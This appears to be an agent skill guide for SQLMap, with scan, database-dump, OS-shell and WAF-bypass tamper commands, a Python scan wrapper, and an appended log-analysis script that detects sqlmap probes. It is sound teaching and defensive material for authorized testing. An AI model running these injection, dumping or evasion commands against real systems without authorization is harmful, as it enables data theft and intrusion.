Sqlmap Database Smart

Skill · Cliptics · security · v1.0.0 · MIT

Automate SQL injection detection and exploitation using SQLMap, the industry-standard open-source penetration testing tool. This skill covers SQLMap command syntax, tamper scripts, data extraction, OS-level access, WAF bypass, and integration with Burp Suite for authenticated testing.

When to Use This Skill

Choose Sqlmap Database Smart when you need to:

  • Automatically detect and exploit SQL injection vulnerabilities
  • Extract database schemas, tables, and data from vulnerable applications
  • Test multiple injection techniques simultaneously (UNION, blind, error, stacked)
  • Bypass WAF protections with tamper scripts during authorized testing

Consider alternatives when:

  • You need to understand SQL injection fundamentals (use Comprehensive SQL Module)
  • You need manual, targeted injection testing (use manual techniques)
  • You need to test NoSQL injection (use NoSQL-specific tools)

Quick Start

# Basic detection
sqlmap -u "https://target.com/page?id=1" --batch

# POST request with specific parameter
sqlmap -u "https://target.com/login" --data="username=admin&password=test" -p username --batch

# With authentication cookie
sqlmap -u "https://target.com/api/users?id=1" --cookie="session=abc123" --batch

# From Burp Suite saved request
sqlmap -r request.txt --batch
# Python wrapper for SQLMap automation
import subprocess


class SQLMapWrapper:
    """Automate SQLMap scanning in penetration tests."""

    def __init__(self, sqlmap_path='sqlmap'):
        self.sqlmap_path = sqlmap_path

    def _run(self, cmd, timeout):
        """Execute one sqlmap invocation (argument list, so no shell quoting) and collect its output."""
        print(f"Running: {' '.join(cmd)}")
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return {
            'stdout': result.stdout,
            'stderr': result.stderr,
            'returncode': result.returncode,
        }

    def scan(self, url, params=None, method='GET', data=None, cookie=None,
             level=1, risk=1, technique='BEUSTQ', tamper=None,
             output_dir='/tmp/sqlmap_output'):
        """Run SQLMap scan with specified options."""
        cmd = [
            self.sqlmap_path,
            '-u', url,
            '--batch',                  # Non-interactive: default answers for all prompts
            '--level', str(level),
            '--risk', str(risk),
            '--technique', technique,
            '--output-dir', output_dir, # Keep logs/session files as evidence
            '--flush-session',          # Ignore any earlier session for this target
        ]
        if params:
            cmd.extend(['-p', params])
        if cookie:
            cmd.extend(['--cookie', cookie])
        if tamper:
            cmd.extend(['--tamper', tamper])
        if method == 'POST':
            cmd.extend(['--method', 'POST'])
        if data:
            cmd.extend(['--data', data])    # POST body, e.g. "username=admin&password=test"
        return self._run(cmd, timeout=300)

    def enumerate_dbs(self, url):
        """Enumerate databases on a confirmed vulnerable target."""
        cmd = [self.sqlmap_path, '-u', url, '--batch', '--dbs']
        return self._run(cmd, timeout=300)['stdout']

    def dump_table(self, url, db, table):
        """Dump a specific table from a confirmed vulnerable target."""
        cmd = [
            self.sqlmap_path, '-u', url, '--batch',
            '-D', db, '-T', table, '--dump',
        ]
        return self._run(cmd, timeout=600)['stdout']


# scanner = SQLMapWrapper()
# result = scanner.scan("https://target.com/search?q=test", params="q")

Core Concepts

SQLMap Options Reference

Option      | Description                      | Example
-u URL      | Target URL with parameter        | -u "http://target/page?id=1"
-r FILE     | Load HTTP request from file      | -r burp_request.txt
--data      | POST data                        | --data="user=admin&pass=test"
-p PARAM    | Testable parameter(s)            | -p "id,name"
--cookie    | HTTP Cookie header               | --cookie="sess=abc"
--level     | Tests to perform (1-5)           | --level 3
--risk      | Risk of test payloads (1-3)      | --risk 2
--technique | SQL injection techniques         | --technique BEUST
--tamper    | Tamper scripts for WAF bypass    | --tamper=space2comment
--dbs       | Enumerate databases              | --dbs
--tables    | Enumerate tables                 | -D dbname --tables
--dump      | Dump table data                  | -D db -T table --dump
--os-shell  | OS command shell (if possible)   | --os-shell
--batch     | Non-interactive mode             | --batch

Common Tamper Scripts for WAF Bypass

# Space bypass (replace spaces)
sqlmap -u URL --tamper=space2comment
sqlmap -u URL --tamper=space2plus
sqlmap -u URL --tamper=space2randomblank

# Case manipulation
sqlmap -u URL --tamper=randomcase
sqlmap -u URL --tamper=uppercase

# Encoding bypass
sqlmap -u URL --tamper=charencode
sqlmap -u URL --tamper=chardoubleencode
sqlmap -u URL --tamper=base64encode

# Operator substitution (between replaces ">", equaltolike replaces "=")
sqlmap -u URL --tamper=between
sqlmap -u URL --tamper=equaltolike

# Multiple tampers (applied in the order given)
sqlmap -u URL --tamper=space2comment,randomcase,charencode

# Common WAF-specific combinations
# ModSecurity:
sqlmap -u URL --tamper=modsecurityversioned
# MySQL specific:
sqlmap -u URL --tamper=space2comment,between,randomcase
# MSSQL specific:
sqlmap -u URL --tamper=space2mssqlblank,uppercase

Configuration

Parameter | Description                                              | Default
level     | Test thoroughness (1-5; higher = more tests)             | 1
risk      | Payload risk level (1-3; higher = more dangerous)        | 1
technique | B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline | "BEUSTQ"
threads   | Concurrent requests                                      | 1
timeout   | Request timeout (seconds)                                | 30
retries   | Retry count for failed requests                          | 3
delay     | Delay between requests (seconds)                         | 0
tamper    | WAF bypass tamper scripts                                | None

Best Practices

  1. Start with --level 1 --risk 1 and increase only if needed — Higher levels send more payloads and take longer. Level 1 catches most common SQL injections. Increase to --level 3 for testing cookies and HTTP headers, and --risk 2 for more aggressive payloads that might cause data modifications.

  2. Use -r request.txt with Burp Suite for complex requests — For authenticated endpoints, POST requests with JSON bodies, or requests with custom headers, save the request from Burp and load it with -r. This captures all headers, cookies, and body formatting accurately.

  3. Specify the DBMS type when known for faster detection — If you know the target uses MySQL, add --dbms=mysql. This skips payloads for other database types, making the scan 5-10x faster. Wrong DBMS specification causes false negatives — use only when confident.

  4. Always use --batch for automated scripts — Without --batch, SQLMap prompts for user input at multiple decision points. In automated pipelines, this causes the scan to hang indefinitely. --batch uses default answers for all prompts.

  5. Save and review all SQLMap output — Use --output-dir to save scan results. SQLMap creates log files with every request/response, which serve as evidence for the penetration test report. Review the session file to understand exactly what was tested.

Common Issues

SQLMap reports "all tested parameters do not appear to be injectable" — The parameter may genuinely not be vulnerable, or SQLMap needs more aggressive testing. Try: --level 5 --risk 3 for maximum coverage, add --tamper scripts if a WAF is present, or test with a known injectable parameter first to verify SQLMap is working correctly.

SQLMap is extremely slow on blind injection — Blind injection extracts data one character at a time via binary search. For large databases, this takes hours. Use --threads 5 to parallelize (check for session-based issues first), or extract only specific data with -D db -T table -C column --dump.

WAF blocks SQLMap's user agent — SQLMap's default User-Agent identifies itself as SQLMap. Use --random-agent to rotate through common browser user agents, or set a specific one with -A "Mozilla/5.0...". Also add --delay 1 to avoid rate-based WAF triggers.
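The same two facts that make the tamper scripts and --random-agent necessary (sqlmap's default User-Agent names itself, and tamper scripts rewrite spaces into inline comments and randomize keyword case) are what a defender looks for in web server logs. The script below is an added example and is not part of this skill or of SQLMap: it parses combined-format access log lines, flags the sqlmap User-Agent, /**/ inline-comment obfuscation, mixed-case SQL keywords, and time-based or boolean probes, then reports source addresses with repeated hits. The log lines, addresses and User-Agent strings are constructed samples, and the indicator names and the hit threshold are choices made for this example.

```python
import re
import urllib.parse
from collections import defaultdict

# Constructed sample access log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page?id=1%27%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /page?id=1/**/uNiOn/**/sElEcT/**/1 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [01/Jan/2024:10:00:04 +0000] "GET /page?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh)"
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache/nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SQL_KEYWORDS = ("union", "select", "and", "or", "sleep", "benchmark", "waitfor")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)
# Time-based probes: SLEEP()/BENCHMARK()/pg_sleep() calls or WAITFOR DELAY
TIME_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.IGNORECASE)
# Boolean probes: "AND 1=1" / "OR 2=3" style tautologies
BOOLEAN_RE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(path, user_agent):
    """Return indicator names for one request; an empty list means nothing suspicious."""
    indicators = []
    if "sqlmap" in user_agent.lower():          # default sqlmap User-Agent
        indicators.append("sqlmap-user-agent")
    query = path.partition("?")[2]
    decoded = urllib.parse.unquote_plus(query)  # look at what the DB would see
    if "/**/" in decoded:                       # space2comment-style obfuscation
        indicators.append("inline-comment-obfuscation")
    for kw in KEYWORD_RE.findall(decoded):      # randomcase-style keywords
        if kw != kw.lower() and kw != kw.upper():
            indicators.append("mixed-case-keyword")
            break
    if TIME_RE.search(decoded):
        indicators.append("time-based-probe")
    if BOOLEAN_RE.search(decoded):
        indicators.append("boolean-probe")
    return indicators


def analyze(log_text, threshold=2):
    """Aggregate per source IP and return those with at least `threshold` flagged requests."""
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0, "indicators": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        hits = classify_request(rec["path"], rec["ua"])
        if hits:
            stats["flagged"] += 1
            stats["indicators"].update(hits)
    return {ip: s for ip, s in per_ip.items() if s["flagged"] >= threshold}


if __name__ == "__main__":
    for ip, stats in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {stats['flagged']}/{stats['requests']} requests flagged, "
              f"indicators={sorted(stats['indicators'])}")
```

Requiring several flagged requests per address rather than alerting on a single match is deliberate: one `/**/` or one mixed-case keyword can be legitimate, but a burst of them from one client alongside timing and tautology probes is the shape of an automated scan. The User-Agent check only catches scans run without --random-agent, which is why the payload-shape indicators are included as well.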
